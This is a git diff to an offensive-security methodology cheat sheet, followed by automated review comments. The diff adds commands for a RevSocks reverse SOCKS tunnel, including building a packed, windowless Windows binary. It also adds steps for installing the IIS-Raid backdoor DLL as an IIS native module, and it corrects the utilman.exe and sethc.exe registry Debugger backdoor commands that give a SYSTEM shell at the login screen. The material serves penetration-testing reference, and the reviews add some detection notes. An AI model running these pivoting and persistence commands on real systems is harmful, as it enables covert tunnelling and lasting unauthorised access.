diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 94d0b59a..2fa5a502 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -13,6 +13,7 @@ * [sshuttle](#sshuttle) * [chisel](#chisel) * [Rpivot](#rpivot) +* [RevSocks](#revsocks) * [plink](#plink) * [ngrok](#ngrok) * [Basic Pivoting Types](#basic-pivoting-types) @@ -192,6 +193,38 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro --hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE ``` +## revsocks + +```powershell +# Listen on the server and create a SOCKS 5 proxy on port 1080 +user@VPS$ ./revsocks -listen :8443 -socks 127.0.0.1:1080 -pass Password1234 + +# Connect client to the server +user@PC$ ./revsocks -connect 10.10.10.10:8443 -pass Password1234 +user@PC$ ./revsocks -connect 10.10.10.10:8443 -pass Password1234 -proxy proxy.domain.local:3128 -proxyauth Domain/userpame:userpass -useragent "Mozilla 5.0/IE Windows 10" +``` + + +```powershell +# Build for Linux +git clone https://github.com/kost/revsocks +export GOPATH=~/go +go get github.com/hashicorp/yamux +go get github.com/armon/go-socks5 +go get github.com/kost/go-ntlmssp +go build +go build -ldflags="-s -w" && upx --brute revsocks + +# Build for Windows +go get github.com/hashicorp/yamux +go get github.com/armon/go-socks5 +go get github.com/kost/go-ntlmssp +GOOS=windows GOARCH=amd64 go build -ldflags="-s -w" +go build -ldflags -H=windowsgui +upx revsocks +``` + + ## plink ```powershell diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index f72f90c4..5f0b5ac3 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md 
@@ -9,6 +9,9 @@ * [Registry](#registry) * [Startup](#startup) * [Scheduled Task](#scheduled-task) +* [Serviceland](#serviceland) + * [IIS](#iis) + * [Windows Service](#windows-service) * [Elevated](#elevated) * [HKLM](#hklm) * [Services](#services) @@ -101,7 +104,19 @@ SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Som SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly ``` -## Windows Service +## Serviceland + +### IIS + +IIS Raid – Backdooring IIS Using Native Modules + +```powershell +$ git clone https://github.com/0x09AL/IIS-Raid +$ python iis_controller.py --url http://192.168.1.11/ --password SIMPLEPASS +C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:Module Name /image:"%windir%\System32\inetsrv\IIS-Backdoor.dll" /add:true +``` + +### Windows Service Using SharPersist @@ -148,7 +163,7 @@ PS C:\> Register-ScheduledTask Backdoor -InputObject $D At the login screen, press Windows Key+U, and you get a cmd.exe window as SYSTEM. ```powershell -REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f +REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f ``` #### sethc.exe @@ -156,7 +171,7 @@ REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Hit F5 a bunch of times when you are at the RDP login screen. ```powershell -REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f +REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f ``` 
@@ -164,4 +179,5 @@ REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/) * [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md) -* [SharPersist Windows Persistence Toolkit in C - Brett Hawkins](http://www.youtube.com/watch?v=K7o9RSVyazo) \ No newline at end of file +* [SharPersist Windows Persistence Toolkit in C - Brett Hawkins](http://www.youtube.com/watch?v=K7o9RSVyazo) +* [](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/) \ No newline at end of file
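Review bot: In the Network Pivoting table-of-contents hunk, the new entry is spelled `[RevSocks](#revsocks)` while the heading added later in the same patch is `## revsocks`; the anchor still resolves, but the neighbouring entries (`sshuttle`, `chisel`) use the heading's own casing, so `[revsocks](#revsocks)` would keep the list consistent.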
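Review bot: In the `## revsocks` hunk the second client example contains a typo in the proxy credential, `-proxyauth Domain/userpame:userpass`, which should read `Domain/username:userpass`; both `-pass Password1234` and that credential are obviously placeholders, so consider marking them as such the way the Rpivot section above does with `[server ip]`. The build block is also duplicated: the three `go get` lines appear once under "Build for Linux" and again verbatim under "Build for Windows", and `go build` is immediately followed by `go build -ldflags="-s -w"`, so the first plain build is redundant. Finally, both fences are tagged `powershell` but the commands are Linux shell (`export GOPATH=~/go`, `GOOS=windows GOARCH=amd64 go build`), so a `bash` fence would be accurate; a one-line description of what the tool is (a reverse SOCKS5 proxy multiplexed over a single outbound connection, which is what the `-listen`/`-socks`/`-connect` flags show) would match the other sections and help readers on the defensive side recognise the traffic pattern.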
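Review bot: In the `### IIS` hunk the section heading is followed only by the bare title "IIS Raid – Backdooring IIS Using Native Modules" with no sentence explaining it; at minimum the title should be a link to the MDSec write-up that the references hunk adds, since that is the source of the technique. The fence is tagged `powershell` but the first two commands carry a `$` Unix prompt while the third is a Windows path, so either drop the prompts or split the block. The APPCMD line passes `/name:Module Name` unquoted, which APPCMD will parse as `/name:Module` plus a stray `Name` argument; it should be `/name:"Module Name"`. From a defensive standpoint it is worth one line noting that this technique leaves a persistent entry in the IIS global module list (`%windir%\System32\inetsrv\config\applicationHost.config`), which is where responders should look for unexpected native modules.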
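Review bot: The `utilman.exe` hunk correctly replaces the curly quotes `“C:\windows\system32\cmd.exe”` with straight quotes; as written before the fix, `REG ADD` would have stored the quote characters literally in the `Debugger` value and the path would not have resolved. Since this and the following `sethc.exe` hunk fix the same copy-paste artifact, it is worth grepping the rest of the file for remaining `“`/`”` characters in the same commit. Note for readers that an Image File Execution Options `Debugger` value on an accessibility binary is a well-known persistence indicator and is commonly monitored via registry auditing.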
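Review bot: In the references hunk the new entry `* [](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/)` has an empty link title and will render as a bare link; the title already used in the IIS section, "IIS Raid – Backdooring IIS Using Native Modules - MDSec", fits the `Title - Author` convention of the surrounding entries. The hunk also keeps the file without a trailing newline (`\ No newline at end of file` on both sides); adding one would avoid the same diff noise on the next edit. The existing SharPersist entry reads "Toolkit in C", and since SharPersist is a C# project the `#` was most likely lost; that line is already being touched here, so it is a cheap fix.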